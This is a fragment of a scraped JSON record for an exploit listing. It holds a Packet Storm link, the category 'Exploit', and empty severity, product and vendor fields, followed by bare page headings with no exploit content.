        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://packetstorm.news/files/id/215793/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply